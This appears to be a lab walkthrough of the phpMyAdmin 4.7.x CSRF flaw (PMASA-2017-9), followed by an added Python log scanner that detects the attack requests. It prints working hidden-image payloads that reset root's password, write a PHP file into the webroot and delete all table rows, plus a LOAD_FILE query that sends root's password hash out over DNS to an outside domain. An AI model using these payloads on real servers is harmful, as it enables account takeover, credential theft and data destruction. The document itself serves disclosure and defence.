A critical CSRF vulnerability discovered in the widely used phpMyAdmin open-source administration tool allows an attacker to perform harmful database operations such as DROP TABLE or modifying a user's password.
1 phpMyAdmin 4.7.x XSRF/CSRF Vulnerability (PMASA-2017-9)
phpMyAdmin is a well-known online management tool for MySQL/MariaDB. The phpMyAdmin team released version 4.7.7, which addresses the CSRF vulnerability found by Barot (PMASA-2017-9). The vulnerability allows an attacker to silently execute an arbitrary SQL statement by inducing a logged-in administrator to visit a malicious page.
In this article, we will use VulnSpy's online phpMyAdmin environment to demonstrate the exploit of this vulnerability.
VulnSpy's online phpMyAdmin environment address: https://www.vulnspy.com/?u=pmasa-2017-9
2 Exploit CSRF - Modifying the password of current user
Change the current user's password to www.vulnspy.com, SQL command:
SET password=PASSWORD('www.vulnspy.com');
Exploit Demonstration
2.1 Log in to phpMyAdmin
Username: root Password: toor
2.2 Create a page with malicious code.
Filename: 2.payload.html
<p>Hello World</p>
<img src="http://7f366ec1afc5832757a402b5355132d0.vsplate.me/sql.php?db=mysql&table=user&sql_query=SET%20password%20=%20PASSWORD(%27www.vulnspy.com%27)" style="display:none;" />
2.3 Open the file 2.payload.html in a browser
Go back to phpMyAdmin: you will find that the account has been logged out automatically and that the password of root has been changed.
2.4 Log in successfully with the password www.vulnspy.com
3 Exploit CSRF - Arbitrary File Write
Write the code <?php phpinfo();?> to the file /var/www/html/test.php, SQL command:
select '<?php phpinfo();?>' into outfile '/var/www/html/test.php';
Exploit Demonstration
3.1 Payload
<p>Hello World</p>
<img src="http://7f366ec1afc5832757a402b5355132d0.vsplate.me/sql.php?db=mysql&table=user&sql_query=select '<?php phpinfo();?>' into outfile '/var/www/html/test.php';" style="display:none;" />
3.2 Open the file containing the payload in a browser
3.3 Visit test.php
4 Exploit CSRF - Data Retrieval over DNS
Steal the password hash of root, SQL command:
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT password FROM mysql.user WHERE user='root' LIMIT 1),'.vulnspy.com\\test'));
Fetch the current database name:
SELECT LOAD_FILE(CONCAT('\\\\',(SELECT database()),'.vulnspy.com\\test'));
VSPlate does not support this exploit.
5 Exploit CSRF - Empty All Rows From All Tables
Empty all rows from all tables, SQL command:
DROP PROCEDURE IF EXISTS EMPT;
DELIMITER $$
CREATE PROCEDURE EMPT()
BEGIN
DECLARE i INT;
SET i = 0;
WHILE i < 100 DO
SET @del = (SELECT CONCAT('DELETE FROM ',TABLE_SCHEMA,'.',TABLE_NAME) FROM information_schema.TABLES WHERE TABLE_SCHEMA NOT LIKE '%_schema' and TABLE_SCHEMA!='mysql' LIMIT i,1);
PREPARE STMT FROM @del;
EXECUTE STMT;
SET i = i +1;
END WHILE;
END $$
DELIMITER ;
CALL EMPT();
Exploit Demonstration
5.1 Payload
<p>Hello World</p>
<img src="http://7f366ec1afc5832757a402b5355132d0.vsplate.me/import.php?db=mysql&table=user&sql_query=DROP+PROCEDURE+IF+EXISTS+EMPT%3B%0ADELIMITER+%24%24%0A++++CREATE+PROCEDURE+EMPT%28%29%0A++++BEGIN%0A++++++++DECLARE+i+INT%3B%0A++++++++SET+i+%3D+0%3B%0A++++++++WHILE+i+%3C+100+DO%0A++++++++++++SET+%40del+%3D+%28SELECT+CONCAT%28%27DELETE+FROM+%27%2CTABLE_SCHEMA%2C%27.%27%2CTABLE_NAME%29+FROM+information_schema.TABLES+WHERE+TABLE_SCHEMA+NOT+LIKE+%27%25_schema%27+and+TABLE_SCHEMA%21%3D%27mysql%27+LIMIT+i%2C1%29%3B%0A++++++++++++PREPARE+STMT+FROM+%40del%3B%0A++++++++++++EXECUTE+stmt%3B%0A++++++++++++SET+i+%3D+i+%2B1%3B%0A++++++++END+WHILE%3B%0A++++END+%24%24%0ADELIMITER+%3B%0A%0ACALL+EMPT%28%29%3B%0A" style="display:none;" />
5.2 Open the file containing the payload in a browser
5.3 Go back to phpMyAdmin
You will find that the data in the databases vulnspy_tables and vulnspy_test has been deleted.
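As an added defensive example (not part of the original post or the VulnSpy repository), the following Python script flags the request pattern every payload in this article produces in a web server's access log: a GET to sql.php or import.php that carries sql_query, typically with a Referer from a site other than the phpMyAdmin host. The log lines, host names and the RISKY_FRAGMENTS list are constructed assumptions.

```python
import re
from urllib.parse import parse_qs, urlsplit

# Endpoints the PMASA-2017-9 payloads above hit with a GET-supplied sql_query.
PMA_SQL_ENDPOINTS = ("/sql.php", "/import.php")
# Statement fragments used in the payloads above, plus close relatives (assumed list).
RISKY_FRAGMENTS = ("SET PASSWORD", "INTO OUTFILE", "LOAD_FILE(", "DROP ",
                   "DELETE FROM", "TRUNCATE ", "CREATE PROCEDURE")
# Apache/nginx "combined" log format; the constructed sample below follows it.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>\S+) (?P<path>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "(?P<referer>[^"]*)"')

def analyse_line(line, own_host):
    """Return a finding dict for a request that carries sql_query, else None."""
    m = LOG_RE.match(line)
    if not m:
        return None
    url = urlsplit(m.group("path"))
    if not url.path.endswith(PMA_SQL_ENDPOINTS):
        return None
    params = parse_qs(url.query)          # percent-decodes the query string
    if "sql_query" not in params:
        return None
    sql = " ".join(params["sql_query"][0].split()).upper()
    referer_host = urlsplit(m.group("referer")).hostname
    return {
        "ip": m.group("ip"),
        "endpoint": url.path,
        "method": m.group("method"),
        # A query arriving on GET, or from a page not served by this host, is
        # exactly what the hidden <img src=...> payloads above produce.
        "cross_site": referer_host is not None and referer_host != own_host,
        "via_get": m.group("method") == "GET",
        "risky": [f for f in RISKY_FRAGMENTS if f in sql],
    }

def scan_log(text, own_host):
    """Scan a whole log and keep only the requests worth an alert."""
    found = [analyse_line(ln, own_host) for ln in text.splitlines() if ln.strip()]
    return [f for f in found if f and (f["via_get"] or f["cross_site"] or f["risky"])]

# Constructed sample: a normal page load, a request matching payload 2.2 above,
# and a legitimate POST from the phpMyAdmin UI itself (no sql_query in the URL).
SAMPLE_LOG = """\
203.0.113.7 - - [12/Jun/2018:10:01:02 +0000] "GET /phpmyadmin/index.php HTTP/1.1" 200 1234 "https://pma.example.internal/phpmyadmin/" "Mozilla/5.0"
203.0.113.7 - - [12/Jun/2018:10:01:40 +0000] "GET /phpmyadmin/sql.php?db=mysql&table=user&sql_query=SET%20password%20=%20PASSWORD(%27www.vulnspy.com%27) HTTP/1.1" 200 4321 "http://attacker.example/2.payload.html" "Mozilla/5.0"
203.0.113.7 - - [12/Jun/2018:10:02:05 +0000] "POST /phpmyadmin/import.php HTTP/1.1" 200 2222 "https://pma.example.internal/phpmyadmin/sql.php" "Mozilla/5.0"
"""
```

Running scan_log(SAMPLE_LOG, "pma.example.internal") reports only the second line, marked as cross-site, delivered via GET and containing SET PASSWORD; phpMyAdmin's own UI does not submit queries this way, so such hits deserve an alert even before patching to 4.7.7.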
GitHub Source
https://github.com/vulnspy/PMASA-2017-9
References
PMASA-2017-9 - https://www.phpmyadmin.net/security/PMASA-2017-9/
CSRF Vulnerability in phpMyAdmin allows attackers to perform DROP TABLE with a single click! - https://securityaffairs.co/wordpress/67243/hacking/phpmyadmin-csrf-vulnerability.html
phpMyAdmin 4.7.x XSRF/CSRF Vulnerability (PMASA-2017-9) Exploit - http://blog.vulnspy.com/2018/06/12/phpMyAdmin-4-7-x-XSRF-CSRF-vulnerability-PMASA-2017-9-exploit/
phpMyAdmin 4.7.x CSRF Exploitation - http://blog.vulnspy.com/2018/06/10/phpMyAdmin-4-7-x-XSRF-CSRF-vulnerability-exploit/